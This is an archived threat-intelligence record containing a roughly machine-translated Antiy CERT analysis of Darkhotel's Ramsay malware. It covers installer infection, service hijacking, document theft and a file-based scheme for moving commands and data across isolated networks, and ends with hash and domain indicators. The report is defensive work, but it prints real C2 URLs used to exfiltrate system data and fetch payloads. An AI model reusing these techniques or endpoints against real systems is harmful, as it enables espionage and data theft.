{ "id": "f9d75acb-2ef5-46d0-b36c-7e16aa5b44fd", "created_at": "2026-04-06T00:17:57.986051Z", "updated_at": "2026-04-10T03:29:58.214273Z", "deleted_at": null, "sha1_hash": "d13c95c035549df6e296e7e35f1b2be78fba1f49", "title": "Analysis of Ramsay components of Darkhotel's infiltration and isolation network", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1444793, "plain_text": "Analysis of Ramsay components of Darkhotel's infiltration and\r\nisolation network\r\nArchived: 2026-04-05 22:05:07 UTC\r\n1 Overview\r\nAntiy CERT discovered the recent threat behavior of APT organization Darkhotel on April 20, 2020, and\r\ncontinued to follow up the analysis. The Ramsay component of this penetration and isolation network and the\r\nanalysis report associated with the Darkhotel organization are now announced.\r\nThe Darkhotel organization is a general capability national/regional actor with a national background, also known\r\nas Dubnium, Nemim, Tapaoux, APT-C-06, T-APT-02, etc. It was first disclosed by Kaspersky on August 10, 2015\r\nand is a The active target countries that have been active so far are China, North Korea, India, and Japan. In the\r\nprevious attacks, hijacking WiFi delivery bait, spear phishing emails, 0day, nday, abuse of digital signatures, white\r\nuse, and infection of U disk files to achieve physical isolation and other technical means.\r\nIn this incident, the strategy of the Darkhotel organization is to bundle malicious code with legitimate\r\napplications. Previous disclosures to the organization believed that this bundling strategy was to disguise\r\nmalicious code, which belongs to the initial delivery load stage of ATT\u0026CK. But in fact, from the sample Ramsay\r\ncomponent captured recently, the malicious code bundled with the legitimate application belongs to the infected\r\nfile rather than a fake decoy. It belongs to the ATT\u0026CK intranet horizontal migration penetration stage, which is\r\nmainly used to spread malicious code on the isolated network. . There are four reasons for determining that the\r\nDarkhotel penetration activity is an isolated network:\r\nFirst, assuming that the target terminal is deployed with anti-virus software, the file infection method is easy to be\r\ndetected, but no more samples are found based on the hunting situation of active samples, indicating that\r\nDarkhotel activities are limited to specific targets;\r\nSecond, most of the application installation packages for office scenarios come from shared disk downloads or\r\ntrust sharing between colleagues,ChigeEspecially in isolated network scenarios, it is impossible to download from\r\nthe official website of the application;\r\nThird, in the early disclosures about Darkhotel, if there are missing components, they will be downloaded through\r\nPowershell, but the analysis of this Darkhotel activity does not involve network requests or download behaviors;\r\nFourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control\r\ninstruction. When Ramsay scans an infected document brought into an isolated network environment, it reads the\r\ncorresponding instruction and executes the corresponding instruction The payload object spreads on the isolated\r\nnetwork as an attack weapon.\r\nThrough the correlation analysis, the payload of Darkhotel's initial delivery phase was captured.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 1 of 36\n\nFigure 1-1 The ATT\u0026CK mapping corresponding to the penetration of the Ramsay component of the Darkhotel\r\norganization\r\nThe operation involves 28 technical points in 10 stages. The specific technical behaviors are described in the\r\nfollowing table\r\nTable 1-1 Description of the specific technical behavior of the penetration of the Ramsay component of the\r\nDarkhotel organization\r\n2 Malicious code analysis\r\n2.1 Analysis of infected software\r\nThe time stamp of the infected software is March 4, 2020. It appears to be disguised as an installation package of\r\nthe well-known compression software 7Zip. Considering the Trojan's PE infection mechanism, this bait is likely to\r\nbe a victim's network. The normal 7Zip installation package infected by Ramsay v2 is not the initial bait.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 2 of 36\n\nFigure 2-1 Infected software icon\r\nRamsay v2 Trojan release principle is as follows:\r\nThe Installer structure is responsible for finding the location of the 4 special signs of the bait itself, extracting the\r\nincluded normal 7Zip runner, Dropper and normal 7Zip installation package, releasing to a temporary directory\r\nand running:\r\nFigure 2-2 Schematic diagram of decoy installation package\r\nThe normal 7Zip runner is responsible for running the normal 7Zip installation package, and an interactive\r\ninterface pops up in the foreground.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 3 of 36\n\nFigure 2-3 Pop up the normal 7Zip installation interface\r\nDropper is responsible for releasing the subsequent series of functional components:\r\nAfter Dropper is running, you need to check whether you want to create the\r\n\"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\\" directory, and then check whether your command parameter is\r\n\"gQ9VOe5m8zP6\", and then start to release multiple functional components. The method of Dropper release is\r\ndifferent from 7Zip decoy, and it is more direct: starting from the specified offset of Dropper itself, reading the\r\nspecified size bytes, then changing the first two bytes back to the MZ header, and finally writing to the specified\r\nposition.\r\nThe included components are listed as follows, according to the system environment to choose to release:\r\nTable 2-1 Each functional component\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 4 of 36\n\nThe following are examples of core functional components:\r\n\"bindsvc.exe\" component\r\nThis component is responsible for infecting the EXE program in the non-system disk and the intranet network\r\nshare, waiting for the attack target to propagate into the isolated network. The infection result is the same as the\r\nfile structure of the 7Zip decoy above, but the normal software at the end is replaced with each infection. The\r\nspecific process is detailed in Chapter 3.\r\n\"msfte.dll\" component\r\nThis component distinguishes between 32-bit and 64-bit. The attacker named it internally: \"Ramsay\".\r\nOperation mode: \"msfte.dll\" can hijack the system service \"WSearch\" in the system32 directory, and it is called\r\nand run by the system program \"SearchSystemHost.exe\" with SYSTEM permission.\r\nThe main functions are divided into DllEntryPoint(), AccessDebugTracer() and AccessRetailTracer() according to\r\nthe exported functions:\r\n2.1.1 Export function: DllEntryPoint()\r\n1. Obtain the local hardware GUID.\r\n2. Release the script \"%APPDATA%\\\\Microsoft\\\\Word\\\\winword.vbs\" to extract plain text from users' recent\r\nWord documents.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 5 of 36\n\nFigure 2-4 Extract text from the user's recent Word document\r\n3. Steal users' recent documents:\r\nRelease the official WinRAR program, encrypt and package shortcuts of users' recent files:\r\n%APPDATA%\\\\Microsoft\\\\Windows\\\\Recent\\\\*.lnk (shortcut for files recently accessed by users)\r\nThe packaging password is: PleaseTakeOut6031416!!@@##\r\n4. Check whether it is in the process \"HYON.exe\" or \"BON.exe\" or \"Cover.exe\", corresponding to why the\r\nsoftware has not been determined. The attacker also gave the internal name of the \"msfte.dll\" component:\r\n\"Ramsay\", and the internal version was v8.\r\nFigure 2-5 The internal name of the \"msfte.dll\" component\r\n5. Based on custom file transfer control instructions, see Chapter 3.\r\n2.1.2 Export functions: AccessDebugTracer() and AccessRetailTracer()\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 6 of 36\n\n1. Inject itself into the explorer.exe process.\r\n2. Write its own version number to \"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\version.ini\", this time the version is\r\n8.\r\n3. Collect system information, including system version, process list, network connection, network configuration,\r\nrouting information, ARP table, process calling msfte.dll, network sharing, Pin \"server\" host results (not exist\r\nnormally), call The hfile.sys system service. This information will be encrypted and saved to the .rtt file in the\r\n\"%APPDATA%\\\\Microsoft\\\\UserSetting\\\\MediaCache\\\\\" directory.\r\nFigure 2-6 Collecting system information\r\n4. Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE\r\nbrowser:\r\n\"%USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\Temporary Internet Files\\\\Content.IE5\\\\\"\r\n5. Collect information about each disk, including directory and file lists, disk names, total space, and remaining\r\nspace.\r\nEnumerate A to Z to collect the information of the existing disk.\r\nCreate a window named \"lua\" and set the lpfnWndProc function to collect information when an external\r\nremovable storage device is connected:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 7 of 36\n\nFigure 2-7 Collecting information of external removable storage devices\r\n6. Intranet CVE-2017-0147 vulnerability scan:\r\nCVE-2017-0147 is a Windows SMB information leakage vulnerability in the famous Eternal series. Here, the\r\nattacker sends a special data packet to the Microsoft server's message block 1.0 (SMBv1) in the intranet, and only\r\nchecks whether the vulnerability exists. use:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 8 of 36\n\nFigure 2-8 Sending a missing scan data packet to determine whether it is available\r\n7. Intranet shared directory scanning:\r\nInformation collection: Collect sub-directories and file lists, disk names, total space, and remaining space shared\r\nby intranet networks.\r\nFile collection: Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the network sharing directory.\r\n8. Load the DLL named \"netmgr_%d.dll\" under the \"%SystemRoot%\\\\System32\\\\Identities\\\\\" directory, %d takes\r\n1 to 9. The DLL is released by the hidden data passed in by the attacker (see Chapter 3 Ramsay's communication\r\nmethod based on file transfer), and no entity is currently obtained:\r\nFigure 2-9 Load netmgr_%d.dll\r\n2.2 Analysis of Vulnerability Exploitation Documents\r\nThe vulnerability exploit document entered the target's internal network through spear phishing emails,\r\nsuccessively dropped VBS scripts through vulnerabilities CVE-2017-0199 and CVE-2017-8570, and added\r\nregistry entries to establish a persistent mechanism. The attacker concealed the PE file in the picture, loaded and\r\nran it through the VBS script, and used open source tools to bypass the UAC. The main function was to collect the\r\nvictim's system information and external removable storage device information.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 9 of 36\n\nThe Ramsay v1 sample does not have the function of infecting normal files, but it has the ability to implement file\r\ntransfer control commands and exudation based on customization. Overall, the main purpose of this attack file is\r\nto detect and detect the target network environment.\r\nThe text of the document bait \"accept.docx\" is blank, and the last save time is May 2, 2019, which is earlier than\r\nthe infected software bait.\r\nThe metadata includes \"제목\" in Korean, which means \"title\" in Chinese:\r\nFigure 2-10 The metadata of the decoy document contains Korean\r\nThe document utilizes the CVE-2017-0199 vulnerability, and when triggered, it will open the included CVE-2017-\r\n8570 vulnerability exploitation document \"afchunk.rtf\".\r\n\"Afchunk.rtf\" executes the released SCT script OfficeTemporary.sct. OfficeTemporary.sct is responsible for\r\nreleasing and executing the VBS script %ALLUSERSPROFILE%\\slmgr.vbs.\r\nslmgr.vbs first adds itself to the Run entry of the registry to achieve boot startup:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\slmgr,%ALLUSERSPROFILE%\\slmgr.vbs\r\nThen extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data,\r\ndecode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE%\r\ndirectory and run it.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 10 of 36\n\nFigure 2-11 Special logo and PE data attached to the picture\r\nThe complete process is as follows:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 11 of 36\n\nFigure 2-12 Document decoy execution process\r\nThe released random name.exe is an in-depth analysis and belongs to the earlier version of Dropper released by\r\nthe software decoy above.\r\nThere are many important function code overlaps with each other, for example:\r\n· After running, first check whether its own parameter is \"gQ9VOe5m8zP6\".\r\n· Run a set of CMD commands to collect system information.\r\n· Collect information on local and external removable storage devices.\r\n· Load the \"netmgr_%d.dll\" delivered by the attacker, %d takes 1 to 9.\r\n· Shortcut to steal recent user files.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 12 of 36\n\n· Release open source scripts to extract plain text from users' recent Word documents.\r\n· Use the open source UACME component BypassUAC.\r\n· Command control based on file transfer, instructions and functions are the same.\r\nThe differences of this Dropper are as follows:\r\n· With fewer functional components:\r\nTable 2-2 Functional components\r\n· Screen capture every 30 seconds\r\n· When an external removable storage device is connected, in addition to collecting information, it will also\r\ncapture the screen at the moment.\r\n· The password for RAR packaging is PleaseTakeOut!@#\r\n· Based on custom file transfer control instructions, see Chapter 3.\r\n3 Break through the isolated network conjecture\r\n3.1 Breaking through the conjecture of isolated networks\r\nThe attacker's conjecture to break through the target isolation network is based on the threat behavior of the\r\nmalicious code function, rather than the association of the malicious code timing space. Darkhotel activities are\r\nlimited to specific targets. According to the USB data collected by the Ramsay v1 Trojan during the operation\r\nactivities, it was found that there is an isolated network in the target. Because the C2 based on the network\r\nprotocol cannot reach the isolated network, it has to develop an isolated network infection program.\r\nOn the other hand, in view of the fact that ordinary document files brought out by the isolated network through the\r\nremovable device are not classified, the attacker chooses to scan all documents inside the isolated network as\r\nmuch as possible. The scenario attached to the infected general document greatly increases the possibility that\r\nimportant information will be brought out by the mobile device. At the same time, the attacker kept the Ramsay v2\r\nTrojan on the isolated network to continue scanning the document. Once the document was found to be brought\r\ninto the isolated network environment, it reads the corresponding instruction and executes the payload object\r\ncorresponding to the instruction.\r\nThe complete process of file transfer control instructions based on custom:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 13 of 36\n\nThe attacker's current location may be on the target intranet, which can control a certain number of machines and\r\nfiles on shared directories.\r\nStep 1. Infect the normal EXE file and execute it through the machine that the victim carries into the isolated\r\nnetwork.\r\nStep 2. The compromised data in the compromised isolated network machine is attached to the end of the normal\r\nWord document;\r\n1) Word documents with stolen data are carried by the victims and evacuated from the isolation network;\r\n2) The attacker finds these Word documents and reads the attached theft data;\r\nStep 3. The attacker infects the new Word document, attaching commands and executing objects.\r\n1) The Word document was carried by the victim into the isolation network;\r\n2) The additional commands and execution objects are executed in the machine that has been compromised in the\r\nisolated network;\r\n3) The log of the execution result is also taken out of the isolated network with step 2.\r\nFigure 3-1 Flowchart of conjecture breakthrough\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 14 of 36\n\n3.2 Break through the isolation network to realize code analysis\r\nThe means for the attacker to break through the isolation network is to infect the EXE files in the local non-system\r\ndisk and the shared directory of the intranet (especially in the removable storage device) to form a new bait with\r\nthe same structure as the 7Zip software bait, and then hope to attack The target is carried into the externally\r\nisolated network environment through the mobile storage device to be run.\r\nFigure 3-2 Normal EXE file infection process\r\nThe structure template of infection completion is shown in the figure below. The special sign\r\n“9J7uQTqgTxhqHaGUue5caaEr3KU” at the end of the file is to mark the completion and avoid repeated\r\ninfection.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 15 of 36\n\nFigure 3-3 Structure template after infection\r\nCommunication method: Based on file transmission control instructions\r\nThe attacker chose to transfer data through office files to break through network isolation. We suspect that this\r\nmay be based on the office habits of the attack target frequently carrying document files in and out of the isolated\r\nnetwork.\r\nThe specific implementation of communication can be divided into the 2019 version and the 2020 version. Take\r\nthe 2019 version as an example:\r\nIncoming instructions and execution objects:\r\nThe attacker can infect the .doc and .docx documents in the victim's host outside the isolated network, and append\r\ninstructions and data to the tail to form the structure in the figure below. Wait for the attack target to carry the\r\ninfected machine that arrives in the isolated network, the additional data will be read and executed by the Ramsay\r\ncomponent.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 16 of 36\n\nFigure 3-4 Instruction data additional structure\r\nBased on the custom file transfer control instructions are as follows:\r\nTable 3-1 Acceptable commands and functions\r\nAfter the instruction is completed, the additional data is deleted and the infected file is restored.\r\nStealing data leaked:\r\nThis stage takes place in infected machines on the quarantine network. The steps are as follows:\r\nStep 1: Search for local .doc and .docx documents, and ask them to be created or last accessed within 1 month.\r\nStep 2: RAR encrypts and packs the folder where the stolen data is stored, the password is PleaseTakeOut!@#\r\nStep 3: The RAR compressed package is subjected to another round of custom encryption.\r\nStep 4: Append data to the end of the .doc or .docx document, including the Magic logo, native hardware GUID,\r\nand encrypted packaged data. Since the same document file may be infected multiple times, there may be multiple\r\nadditional combinations at the end.\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 17 of 36\n\nFigure 3-5 Additional structure of stolen data\r\nStep 5 (guessing): Wait for the victim to carry the batch of data-attached documents into the isolation network and\r\nreach the host or shared directory that has been compromised by the attacker.\r\nStep 6 (guessing): Based on the fixed Magic value, the attacker periodically searches for files in the compromised\r\nhost or shared directory, finds the batch of documents, and extracts the GUID and secret data of the victim host\r\nattached to the tail to complete the exfiltration.\r\n4 Analysis of sample association and organization attribution\r\n4.1 Sample association\r\nAccording to the metadata and exploit characteristics of the \"afchunk.rtf\" attack document contained in\r\n\"accept.docx\", another example of \"afchunk.rtf\" can be associated:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 18 of 36\n\nFigure 4-1 afchunk.rtf contained in \"accept.docx\"\r\nFigure 4-2 The newly associated afchunk.rtf\r\nThe parent of the newly associated \"afchunk.rtf\" comes from the RAR compressed package \"Technical\r\nAgreement.rar\". The overall execution process is as follows:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 19 of 36\n\nFigure 4-3 Complete execution process of associated samples\r\n\"Googleofficechk.sct\" first constructs the information of the current process list of the system into the following\r\nURL and returns it to C2:\r\nhttp://find-image.com/img/image.php?K=F84hFhfeHUiFQE\u0026test=Base64 encoded process list\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 20 of 36\n\nFigure 4-4 Get the process list and return to C2\r\nThen release \"svupdate32.exe\" and \"msrvc32.exe\" to the system startup directory.\r\n\"Msrvc32.exe\" is responsible for collecting system information, including the system version, architecture, region,\r\nlanguage, and registrant, and constructs a URL to send this information back to C2:\r\nhttp://win-api-essentials[.]com/package/v2.php?im=000C29A414B2\u0026fg=u\u0026inf=Base64 encoded system\r\ninformation\r\nRe-construct the URL and download the file to the randomly named file in the\r\n\"%LOCALAPPDATA%\\Local\\VirtualStore\\\" directory:\r\nhttp://win-api-essentials[.]com/package/v2.php?im=000C29A414B2\u0026fg=d\r\nAlternate C2: http://service.email-126[.]net/box/open.php?se=000C29A414B2\u0026fg=d\r\nFinally, according to the instructions and file names contained in the C2 return data, the next operation is\r\nperformed on the randomly named files:\r\nTable 4-1 Acceptable commands and functions\r\nRelated to the Samsay event and the DarkHotel historical Trojan:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 21 of 36\n\nAfter comparison, the \"svupdate32.exe\" component and the Trojan of this Ramsay event, as well as the DropBox-based Trojan program of the DarkHotel organization that was exposed by Tencent Yujian in January 2019:\r\neea409bbefee23eb475e4161f06d529a, each of which has a unique code shared:\r\nFigure 4-5 \"svupdate32.exe\" shared code\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 22 of 36\n\nFigure 4-6 DarkHotel's historical Trojan based on Dropbox\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 23 of 36\n\nFigure 4-7 netwiz.exe in Ramsay activity\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 24 of 36\n\nFigure 4-8 Sharing among the three\r\n4.2 Organizational association\r\nAfter in-depth code comparison, we found many connections between Ramsay and Darkhotel:\r\nAlgorithm overlap\r\nThe custom encryption algorithm logic used by Ramsay before the data landed is the same as the algorithm that\r\nChianxin previously disclosed [2] and used by the Darkhotel organization many times:\r\nFigure 4-9 Ramsay's sample algorithm\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 25 of 36\n\nFigure 4-10 The algorithm disclosed by Chianxin earlier\r\nAnd the combination selection of the two algorithms, the second of which has only one more addition step than\r\nhas been disclosed:\r\nFigure 4-11 Sample algorithm for this sample\r\nFigure 4-12 The algorithm disclosed by Chianxin\r\n2. Function and technology overlap:\r\nThere are many functions and technical overlaps between Ramsay and Darkhotel’s historical Trojans, such as:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 26 of 36\n\n· Hijack the system's WSearch service to achieve persistence and obtain SYSTEM permissions.\r\n· Use WinRAR to encrypt and package the stolen files.\r\n· Create a window named \"lua\" to realize file stealing.\r\n· The current system information is collected through a set of CMD commands. Most of this set of commands\r\noverlap and are in the same order.\r\n3. Special logo heads overlap:\r\nAccording to \"bindsvc.exe\" component used to locate the location of the data header:\r\nFigure 4-13 The logo head of the Ramsay Trojan\r\nThe sample from June 2019 can be correlated. At this time, these three marker heads are still used as the location\r\nof the positioning data:\r\nFigure 4-14 The logo head of the Darkhotel special Trojan in the past\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 27 of 36\n\nDuring the analysis of this Darkhotel event, it was observed that there are different special signs for different\r\nsample loads, which have the role of locating the data location. These residual signs have also appeared in the\r\nprevious activities of Darkhotel. From the time axis, the activities of this event overlap with the previous\r\nactivities. It can be seen that Darkhotel has the ability to rapidly iterate according to changes in the target\r\nenvironment, and timely The ability to update optimized load codes.\r\nFigure 4-15 Darkhotel special logo evolution timeline\r\nAfter detailed comparison, this old sample of 2019 is the Darkhotel special Trojan described in the report of the\r\nTencent Security Team's \"Darkhotel's \"Darkhotel's Latest Attack on Chinese Foreign Trade Persons\" in June 2019\r\n[3].\r\nThere are many codes overlapping with the Darkhotel special Trojan. For example, determine whether the\r\nbeginning of the data returned by C2 is \"\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 28 of 36\n\nFigure 4-16 Sample in 2019\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 29 of 36\n\nFigure 4-17 Samples disclosed by the Tencent security team\r\nThe fields and values of the spliced C2 URL are also exactly the same:\r\nC2 of the 2019 sample:\r\nhttp://service-security-manager[.]com/c50c9f6c-a306-41d0-8d24-bf0c3a5f4a0e/21270.php?\r\nvol=honeycomb\u0026q=4znZCTTa2J24\u0026guid=Native hardware GUID\r\nSample C2 of Tencent Yujian Report:\r\nhttp://game-service[.]org/584e3411-14a7-41f4-ba1d-e203609b0471/6126.php?\r\nvol=honeycomb\u0026q=4znZCTTa2J24\u0026guid=Local hardware GUID\r\n4. The metadata of some decoy documents includes Korean \"제목\" and \"사용자\", the Chinese meanings\r\ncorrespond to \"title\" and \"user\" respectively:\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 30 of 36\n\nFigure 4-18 The metadata of the decoy document contains Korean\r\nWhen the author of the decoy document inserts the picture object, the default language of Office is also Korean.\r\nThe Chinese meaning of \"그림 3\" is \"Picture 3\":\r\nFigure 4-19 The attacker inserts a picture through the Korean version of Office\r\n5 Summary\r\nIn the analysis process of Darkhotel's isolation network penetration activities, according to document metadata,\r\nvulnerability utilization characteristics, Ramsay infection special signs, etc., it is also related to Darkhotel's related\r\nactivities in recent years, indicating the continuity and discovery of Darkhotel's attack activities in cyberspace.\r\nAfter the high-value target can deploy the attack strategy in time, upgrade the malicious code infection\r\ntechnology, improve the overall attack process, highlighting Darkhotel's advanced persistent threat attributes.\r\nIn 2019, Antiy released the \"Nine Years Resurgence and Reflections of the Stuxnet Incident\" [4], expressing that\r\nthe traditional anti-virus engine and threat intelligence have become two complementary mechanisms. The\r\ntraditional anti-virus engine is aimed at a large number of Malicious code detection and identification capabilities,\r\nand through deep pre-processing, virtual execution and other mechanisms to deal with malicious code variants and\r\ntransformations, so in terms of load detection, there is unparalleled depth of recognition and analysis, but also\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 31 of 36\n\nprovides a large number of load objects Accurate judgment mechanism. In the threat intelligence pyramid,\r\n\"narrow sense intelligence\" such as HASH, IP, and domain names are included in the bottom layer, that is, it is\r\ndifficult to obtain and low in application cost. It can be easily extracted as an attack indicator (beacon) by the\r\ndefender being analyzed, and can be connected to existing extension interfaces such as various security devices,\r\nmanagement devices, and protection software. If we compare Darkhotel’s activities for isolation network\r\npenetration with the more complex and more complete A2PT seismograph, the cost of Darkhotel’s implementation\r\nis lower, and the process of transmission, infection, and exudation is more dependent on personnel, but in the\r\nlonger In the sustainable attack cycle, there is still the possibility of reaching the goal. At the same time, in this\r\nanalysis of Darkhotel's sample association and organizational attribution, by establishing a reliable basic\r\nidentification capability and response mechanism, analyzing the TTP process and related intelligence of the\r\nDarkhotel organization's evolution, a typical combination analysis of detection engine and threat intelligence has\r\nbeen formed Case.\r\nReferences\r\n[1] It is suspected that the Darkhotel APT organization disclosed targeted attacks against Chinese trade industry\r\nexecutives\r\n[2] Sample analysis of recent activities of Darkhotel APT gang\r\nhttps://ti.qianxin.com/blog/articles/analysis-of-darkhotel/\r\n[3] \"Darkhotel\" (Darkhotel)'s latest attack on Chinese foreign traders disclosed\r\n[4] Nine-year resurgence and reflection on the Zhennet incident\r\nhttps://www.antiy.com/response/20190930.html\r\nIOC\r\nSerial number Hashes\r\n1 03BD34A9BA4890F37AC8FED78FEAC199\r\n2 07858D5562766D8239A7C961FEEA087C\r\n3 08943BB237926DD1376D799A4AFE797D\r\n4 0B04998EEB9FB22429A04E3D0E134548\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 32 of 36\n\n5 186B2E42DE0D2E58D070313BD6730243\r\n6 1F3606DDA801A6B7E6BD7CC0E8994241\r\n7 25877AA787B213C67854A08452CDFC5B\r\n8 3439318CEDCF37C1BF5FE6D49DDBB2CB\r\n9 359D2D301455A95F8A2655965B386278\r\n10 3654C3FA86F19D253E4C70BDF5F3D158\r\n11 3E805824F80BBA35AC06EAFC80C6B6AD\r\n12 4A52DB18E3618F79983F0CB1DD83F34A\r\n13 4FA4C81A7D1B945B36403DC95943F01E\r\n14 4FA4C81A7D1B945B36403DC95943F01E\r\n15 52E32DE77509DCB406DA3B81FB9055D7\r\n16 53984EF18C965B49EEB3686460AD540B\r\n17 5D0FAA109DCFDA31AC2D493631E606C2\r\n18 5F564A755100D63B9C6374DABD1E5321\r\n19 615A0F818DC0DED2F138D6B3B2DFD6E5\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 33 of 36\n\n20 6E47F8BE989792800C019BC24DFB1A25\r\n21 74805C5477DA842EB0798B95324F3A65\r\n22 7A5503B148E3A1D88BA9E07D95166159\r\n23 7E4572DB796E27848D23EA5D1E8604AA\r\n24 8413AB4D5A950F81B40CEEBC3F1E7273\r\n25 8AA069860D591119AF2859856AD5F063\r\n26 B2B51A85BDAD70FF19534CD013C07F24\r\n27 BB72720BC4583C6C4C3CAA883A7DEC95\r\n28 C2ADF8BF8D8E4409A4725D0334ED8AA6\r\n29 CC4503B59BABD2E07CF278FF11CE99C7\r\n30 CF133C06180F130C471C95B3A4EBD7A5\r\n31 D0EAD87212B0573447F573639DA49FF8\r\n32 EEA409BBEFEE23EB475E4161F06D529A\r\n33 F028D23CB4EA2C5DCF0A2B6BCAADA0C0\r\n34 A211C80068304FB4A9ACD7AB13720D55\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 34 of 36\n\n35 AA6BB52BD5E3D8B21C113E5AB1A240EA\r\n36 BB72720BC4583C6C4C3CAA883A7DEC95\r\n37 C803D412A5E86FA8DE111B77F2A14523\r\n38 DC0222F1E0868C3612A93BA2D83B99BE\r\n39 E48B89715BF5E4C55EB5A1FED67865D9\r\n40 E61BA12C33DB1696715401D8FD0BAAE9\r\n41 F17D7098BDE0B29441BFCD797812CF88\r\n42 FF5D43B210545F931AE80A847D1789BB\r\nSerial number domain name\r\n1 service-security-manager.com\r\n2 find-image.com (registered email: lorinejeans11@mail.ru)\r\n3 win-api-essentials.com\r\n4 service.email-126.net\r\n5 service.email-126.net\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 35 of 36\n\nSource: https://www.programmersought.com/article/62493896999/\r\nhttps://www.programmersought.com/article/62493896999/\r\nPage 36 of 36", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.programmersought.com/article/62493896999/" ], "report_names": [ "62493896999" ], "threat_actors": [ { "id": "1dadf04e-d725-426f-9f6c-08c5be7da159", "created_at": "2022-10-25T15:50:23.624538Z", "updated_at": "2026-04-10T02:00:05.286895Z", "deleted_at": null, "main_name": "Darkhotel", "aliases": [ "Darkhotel", "DUBNIUM", "Zigzag Hail" ], "source_name": "MITRE:Darkhotel", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "b13c19d6-247d-47ba-86ba-15a94accc179", "created_at": "2024-05-01T02:03:08.149923Z", "updated_at": "2026-04-10T02:00:03.763147Z", "deleted_at": null, "main_name": "TUNGSTEN BRIDGE", "aliases": [ "APT-C-06 ", "ATK52 ", "CTG-1948 ", "DUBNIUM ", "DarkHotel ", "Fallout Team ", "Shadow Crane ", "Zigzag Hail " ], "source_name": "Secureworks:TUNGSTEN BRIDGE", "tools": [ "Nemim", "Tapaoux" ], "source_id": "Secureworks", "reports": null }, { "id": "2b4eec94-7672-4bee-acb2-b857d0d26d12", "created_at": "2023-01-06T13:46:38.272109Z", "updated_at": "2026-04-10T02:00:02.906089Z", "deleted_at": null, "main_name": "DarkHotel", "aliases": [ "T-APT-02", "Nemim", "Nemin", "Shadow Crane", "G0012", "DUBNIUM", "Karba", "APT-C-06", "SIG25", "TUNGSTEN BRIDGE", "Zigzag Hail", "Fallout Team", "Luder", "Tapaoux", "ATK52" ], "source_name": "MISPGALAXY:DarkHotel", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c0cedde3-5a9b-430f-9b77-e6568307205e", "created_at": "2022-10-25T16:07:23.528994Z", "updated_at": "2026-04-10T02:00:04.642473Z", "deleted_at": null, "main_name": "DarkHotel", "aliases": [ "APT-C-06", "ATK 52", "CTG-1948", "Dubnium", "Fallout Team", "G0012", "G0126", "Higaisa", "Luder", "Operation DarkHotel", "Operation Daybreak", "Operation Inexsmar", "Operation PowerFall", "Operation The Gh0st Remains the Same", "Purple Pygmy", "SIG25", "Shadow Crane", "T-APT-02", "TieOnJoe", "Tungsten Bridge", "Zigzag Hail" ], "source_name": "ETDA:DarkHotel", "tools": [ "Asruex", "DarkHotel", "DmaUp3.exe", "GreezeBackdoor", "Karba", "Nemain", "Nemim", "Ramsay", "Retro", "Tapaoux", "Trojan.Win32.Karba.e", "Virus.Win32.Pioneer.dx", "igfxext.exe", "msieckc.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434677, "ts_updated_at": 1775791798, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.pdf", "text": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.txt", "img": "https://archive.orkl.eu/d13c95c035549df6e296e7e35f1b2be78fba1f49.jpg" } }